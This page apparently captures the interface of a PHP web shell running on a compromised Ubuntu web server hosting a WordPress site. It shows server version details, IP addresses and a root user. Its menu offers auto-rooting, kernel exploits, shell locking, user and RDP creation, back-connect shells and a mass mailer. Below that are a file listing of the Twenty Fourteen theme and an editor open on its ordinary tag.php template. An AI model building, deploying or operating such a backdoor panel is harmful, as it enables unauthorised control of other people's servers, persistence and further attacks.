Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
insepet /
wp-content /
themes /
twentyfourteen /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
genericons
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
404.php
719
B
-rw-r--r--
archive.php
2.1
KB
-rw-r--r--
author.php
1.88
KB
-rw-r--r--
category.php
1.49
KB
-rw-r--r--
comments.php
2.62
KB
-rw-r--r--
content-aside.php
2.27
KB
-rw-r--r--
content-audio.php
2.27
KB
-rw-r--r--
content-featured-post.php
1.09
KB
-rw-r--r--
content-gallery.php
2.28
KB
-rw-r--r--
content-image.php
2.27
KB
-rw-r--r--
content-link.php
2.27
KB
-rw-r--r--
content-none.php
961
B
-rw-r--r--
content-page.php
884
B
-rw-r--r--
content-quote.php
2.27
KB
-rw-r--r--
content-video.php
2.27
KB
-rw-r--r--
content.php
2.29
KB
-rw-r--r--
error_log
6.79
KB
-rw-r--r--
featured-content.php
941
B
-rw-r--r--
footer.php
927
B
-rw-r--r--
functions.php
19.92
KB
-rw-r--r--
header.php
2.41
KB
-rw-r--r--
image.php
2.63
KB
-rw-r--r--
index.php
1.53
KB
-rw-r--r--
page.php
1.15
KB
-rw-r--r--
readme.txt
4.2
KB
-rw-r--r--
rtl.css
15.5
KB
-rw-r--r--
screenshot.png
911.43
KB
-rw-r--r--
search.php
1.19
KB
-rw-r--r--
sidebar-content.php
340
B
-rw-r--r--
sidebar-footer.php
395
B
-rw-r--r--
sidebar.php
847
B
-rw-r--r--
single.php
1017
B
-rw-r--r--
style.css
79.31
KB
-rw-r--r--
tag.php
1.55
KB
-rw-r--r--
taxonomy-post_format.php
2.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tag.php
<?php /** * The template for displaying Tag pages * * Used to display archive-type pages for posts in a tag. * * @link https://codex.wordpress.org/Template_Hierarchy * * @package WordPress * @subpackage Twenty_Fourteen * @since Twenty Fourteen 1.0 */ get_header(); ?> <section id="primary" class="content-area"> <div id="content" class="site-content" role="main"> <?php if ( have_posts() ) : ?> <header class="archive-header"> <h1 class="archive-title"><?php printf( __( 'Tag Archives: %s', 'twentyfourteen' ), single_tag_title( '', false ) ); ?></h1> <?php // Show an optional term description. $term_description = term_description(); if ( ! empty( $term_description ) ) : printf( '<div class="taxonomy-description">%s</div>', $term_description ); endif; ?> </header><!-- .archive-header --> <?php // Start the Loop. while ( have_posts() ) : the_post(); /* * Include the post format-specific template for the content. If you want to * use this in a child theme, then include a file called content-___.php * (where ___ is the post format) and that will be used instead. */ get_template_part( 'content', get_post_format() ); endwhile; // Previous/next page navigation. twentyfourteen_paging_nav(); else : // If no content, include the "No posts found" template. get_template_part( 'content', 'none' ); endif; ?> </div><!-- #content --> </section><!-- #primary --> <?php get_sidebar( 'content' ); get_sidebar(); get_footer();
Close